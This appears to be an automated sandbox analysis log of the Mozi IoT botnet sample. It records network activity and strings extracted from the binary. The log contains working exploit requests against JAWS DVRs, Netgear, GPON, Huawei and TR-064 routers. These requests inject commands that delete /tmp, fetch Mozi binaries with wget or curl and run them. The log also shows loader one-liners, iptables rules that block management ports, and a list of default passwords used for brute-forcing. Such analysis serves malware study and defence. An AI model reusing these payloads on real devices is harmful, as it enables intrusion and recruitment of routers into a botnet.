                Source: unknownTCP traffic detected without corresponding DNS query: 206.186.242.243
                Source: unknownTCP traffic detected without corresponding DNS query: 201.254.11.90
                Source: unknownTCP traffic detected without corresponding DNS query: 120.148.200.141
                Source: unknownTCP traffic detected without corresponding DNS query: 7.82.224.45
                Source: unknownTCP traffic detected without corresponding DNS query: 17.46.202.252
                Source: unknownTCP traffic detected without corresponding DNS query: 182.58.239.246
                Source: unknownTCP traffic detected without corresponding DNS query: 170.141.215.107
                Source: unknownTCP traffic detected without corresponding DNS query: 68.124.102.212
                Source: unknownTCP traffic detected without corresponding DNS query: 94.194.209.135
                Source: unknownTCP traffic detected without corresponding DNS query: 11.202.4.51
                Source: unknownTCP traffic detected without corresponding DNS query: 191.117.242.253
                Source: unknownTCP traffic detected without corresponding DNS query: 198.228.200.241
                Source: unknownTCP traffic detected without corresponding DNS query: 24.29.191.22
                Source: unknownTCP traffic detected without corresponding DNS query: 60.207.103.133
                Source: unknownTCP traffic detected without corresponding DNS query: 12.67.83.95
                Source: unknownTCP traffic detected without corresponding DNS query: 174.98.164.70
                Source: unknownTCP traffic detected without corresponding DNS query: 35.119.229.43
                Source: unknownTCP traffic detected without corresponding DNS query: 121.130.73.42
                Source: unknownTCP traffic detected without corresponding DNS query: 186.54.121.35
                Source: unknownTCP traffic detected without corresponding DNS query: 218.243.118.179
                Source: unknownTCP traffic detected without corresponding DNS query: 190.127.144.31
                Source: unknownTCP traffic detected without corresponding DNS query: 142.48.174.160
                Source: unknownTCP traffic detected without corresponding DNS query: 128.70.68.149
                Source: unknownTCP traffic detected without corresponding DNS query: 76.44.19.56
                Source: unknownTCP traffic detected without corresponding DNS query: 131.221.67.66
                Source: unknownTCP traffic detected without corresponding DNS query: 26.221.252.159
                Source: unknownTCP traffic detected without corresponding DNS query: 218.184.12.7
                Source: unknownTCP traffic detected without corresponding DNS query: 98.38.174.140
                Source: unknownTCP traffic detected without corresponding DNS query: 57.122.76.123
                Source: unknownTCP traffic detected without corresponding DNS query: 153.254.249.142
                Source: unknownTCP traffic detected without corresponding DNS query: 75.81.234.138
                Source: unknownTCP traffic detected without corresponding DNS query: 205.200.160.114
                Source: unknownTCP traffic detected without corresponding DNS query: 82.24.32.9
                Source: unknownTCP traffic detected without corresponding DNS query: 195.12.213.244
                Source: unknownTCP traffic detected without corresponding DNS query: 120.94.211.11
                Source: unknownTCP traffic detected without corresponding DNS query: 137.170.59.38
                Source: unknownTCP traffic detected without corresponding DNS query: 99.92.234.88
                Source: unknownTCP traffic detected without corresponding DNS query: 91.225.198.104
                Source: unknownTCP traffic detected without corresponding DNS query: 81.4.149.202
                Source: unknownTCP traffic detected without corresponding DNS query: 23.238.107.169
                Source: unknownTCP traffic detected without corresponding DNS query: 171.254.103.135
                Source: unknownTCP traffic detected without corresponding DNS query: 7.39.247.208
                Source: unknownTCP traffic detected without corresponding DNS query: 125.223.44.138
                Source: unknownTCP traffic detected without corresponding DNS query: 146.247.28.72
                Source: unknownTCP traffic detected without corresponding DNS query: 38.24.144.193
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cacheContent-Type: text/htmlContent-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Wed, 06 Jan 2021 14:00:05 GMTContent-Length: 853Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 1e af 8e 8a a2 59 56 b3 3c cd 97 d3 6a bd 6c f3 3a 9f a5 d9 32 cd eb ba aa d3 ab 79 be 4c 57 75 35 cd 9b a6 58 5e a4 ed 3c 4f eb fc 17 ad f3 a6 1d 3f be bb 3a 7a bc aa f3 b4 69 af cb fc b3 8f 26 d9 f4 ed 45 4d 30 66 db d3 aa ac ea 47 69 ce cf 47 47 df 7e 75 fa fa ab e7 6f 1e a5 3b ef f6 92 6f bf 79 f3 92 5e c9 da 75 f3 28 bd bf b3 23 1f d4 79 d6 54 cb 47 e9 19 30 58 66 65 fa 3a af 2f f3 3a 3d 05 1a d4 53 9d 53 5f 47 bf 4f b5 4e 33 ea b1 ce a7 79 71 29 08 15 4d ca 10 f6 76 76 e8 f3 66 55 2d 9b 3c 9d e4 d3 6c 4d 3f 1f 67 e9 bc ce cf 3f 9b b7 ed aa 79 74 f7 ee 45 d1 ce d7 93 f1 b4 5a dc 6d 7f 3a 5b 4e 7f b0 7e 7b 57 09 70 77 52 56 93 bb 8b ac 21 04 ee 36 f5 f4 6e 93 2d 56 65 de dc 9d 56 cb f3 e2 62 5d 67 6d 51 2d ef 5e e5 78 1d 9f 1c 35 d7 d4 76 31 a6 4f 04 59 0b e9 f7 9c e5 97 8c 78 73 ba cc 26 65 3e 7b 7c 37 3b 4a e5 2d 85 93 36 79 db 62 00 84 fe c7 6d bd ce 3f 56 7a 1e 9d 2d d3 6c 36 2b b8 51 5b d1 00 f3 b4 ac 2e d2 ea 9c 88 36 ab d6 2d 4d ce 0c bf d2 04 e1 43 7c 8f 4e c7 f9 bb dc cc d4 08 7d 35 05 35 49 d7 3c 6d 3e 19 88 0a 6d 45 c3 fc c1 58 09 30 ae ea 8b bb 7b 3b bb bb 77 e9 7f b3 7c b2 be d8 06 c0 9f 6e b6 b3 d5 aa 2c a6 8c 6f b3 5d 2d b7 af 8a e5 ac ba 6a c6 f3 76 51 1e 71 cb 0b 82 ce 83 03 52 b7 ec 65 e7 e1 5d c6 6a 3b bf cc 97 ed 76 5b 67 53 fc 75 5e d5 a6 83 ed b6 92 3e 4e df 7c 37 c5 f7 79 c3 9d 10 39 ce d7 35 8d b8 4e 67 45 76 b1 ac 68 86 e9 2f 0c 9b a8 bc 30 14 7c 43 1f 61 04 3e 49 d2 79 d6 d0 87 6d 7a 55 17 6d 4b 4c 9d 2d af d3 62 49 9d 2e 78 7c 80 6d 88 5a a7 3a 91 e9 15 bd b4 e6 29 c4 f7 d3 6c d5 ae 89 fb 98 e7 bc 77 c7 e9 33 96 89 65 4b 0c 08 36 c6 a4 b6 f3 ac a5 7f 72 0b 6b 51 cd d6 04 87 be f2 20 52 fb 36 4f 33 9e e1 f3 42 3f d4 6e 08 9d ee 74 af db 15 7d 72 5e 57 0b 1a 8b 0c 70 9c be 2c a9 d3 3c 9d ce f3 e9 5b ea d1 74 3b 23 7c 8a f6 da f0 c8 d9 d9 eb d4 9b cf 74 55 55 65 5a af 97 4b a2 3d 37 60 80 3f dd 04 8d 40 34 42 11 0a 61 c6 94 23 5c a7 4c ce 55 5e 2f 0a d2 09 c4 19 c0 19 00 66 05 89 65 5b d5 d4 25 91 93 3e 68 58 2a a0 43 68 34 f8 20 d6 05 d1 a3 ac e8 f7 7c 36 4e 8f 4b 92 bd 25 7d 7e 99 97 d7 e9 35 09 fb 94 34 d1 ac 68 98 5e 44 23 b0 5b 3a b9 26 c8 22 3c 3e c7 fd 10 c5 5b 31 f1 85 3b 27 fe 23 82 83 da f4 82 82 00 65 3e 3e cf ca 26 ff 78 fc ff 00 21 3f 1f df 6a 05 00 00 Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"YV<jl:2yLWu5X^<O?:zi&EM0fGiGG~u
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.44.146.105:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 203.146.142.202:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 203.146.142.202:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 203.146.142.202:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 54.164.156.191:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 45.196.102.179:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 104.98.58.115:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 192.155.170.244:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 184.31.173.81:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: unknownDNS traffic detected: queries for: dht.transmissionbt.com
                Source: unknownHTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 127.0.0.1:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, WorldContent-Length: 118Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Jan 2021 13:57:39 GMTServer: Apache/2.4.39 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 216Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 47 70 6f 6e 46 6f 72 6d 2f 64 69 61 67 5f 46 6f 72 6d 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /GponForm/diag_Form was not found on this server.</p></body></html>
                Source: Mozi.mString found in binary or memory: http://%s:%d/Mozi.a;chmod
                Source: Mozi.mString found in binary or memory: http://%s:%d/Mozi.a;sh$
                Source: Mozi.mString found in binary or memory: http://%s:%d/Mozi.m
                Source: Mozi.mString found in binary or memory: http://%s:%d/Mozi.m;
                Source: Mozi.mString found in binary or memory: http://%s:%d/Mozi.m;$
                Source: Mozi.mString found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
                Source: Mozi.mString found in binary or memory: http://%s:%d/bin.sh
                Source: Mozi.mString found in binary or memory: http://%s:%d/bin.sh;chmod
                Source: Mozi.mString found in binary or memory: http://127.0.0.1
                Source: Mozi.mString found in binary or memory: http://127.0.0.1sendcmd
                Source: Mozi.mString found in binary or memory: http://HTTP/1.1
                Source: Mozi.mString found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
                Source: .config.6.drString found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
                Source: Mozi.mString found in binary or memory: http://ipinfo.io/ip
                Source: alsa-info.sh0.6.drString found in binary or memory: http://pastebin.ca)
                Source: alsa-info.sh0.6.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
                Source: alsa-info.sh0.6.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
                Source: Mozi.mString found in binary or memory: http://purenetworks.com/HNAP1/
                Source: Mozi.mString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: Mozi.mString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                Source: Mozi.mString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
                Source: alsa-info.sh0.6.drString found in binary or memory: http://www.alsa-project.org
                Source: alsa-info.sh0.6.drString found in binary or memory: http://www.alsa-project.org.
                Source: alsa-info.sh0.6.drString found in binary or memory: http://www.alsa-project.org/alsa-info.sh
                Source: alsa-info.sh0.6.drString found in binary or memory: http://www.alsa-project.org/cardinfo-db/
                Source: alsa-info.sh0.6.drString found in binary or memory: http://www.pastebin.ca
                Source: alsa-info.sh0.6.drString found in binary or memory: http://www.pastebin.ca.
                Source: alsa-info.sh0.6.drString found in binary or memory: http://www.pastebin.ca/upload.php
                Source: /tmp/Mozi.m (PID: 4580)HTML file containing JavaScript created: /usr/networksJump to dropped file
                Source: Initial sampleString containing 'busybox' found: busybox
                Source: Initial sampleString containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
                Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
                Source: Initial sampleString containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
                Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|more
                Source: Initial sampleString containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
                Source: Initial sampleString containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
                Source: Initial sampleString containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
                Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
                Source: Initial sampleString containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
                Source: Initial sampleString containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
                Source: Initial sampleString containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
                Source: Initial sampleString containing potential weak password found: admin
                Source: Initial sampleString containing potential weak password found: default
                Source: Initial sampleString containing potential weak password found: support
                Source: Initial sampleString containing potential weak password found: service
                Source: Initial sampleString containing potential weak password found: supervisor
                Source: Initial sampleString containing potential weak password found: guest
                Source: Initial sampleString containing potential weak password found: administrator
                Source: Initial sampleString containing potential weak password found: 123456
                Source: Initial sampleString containing potential weak password found: 54321
                Source: Initial sampleString containing potential weak password found: password
                Source: Initial sampleString containing potential weak password found: 12345
                Source: Initial sampleString containing potential weak password found: admin1234
                Source: Initial samplePotential command found: POST /cdn-cgi/
                Source: Initial samplePotential command found: GET /c HTTP/1.0
                Source: Initial samplePotential command found: POST /cdn-cgi/ HTTP/1.1
                Source: Initial samplePotential command found: GET %s HTTP/1.1
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
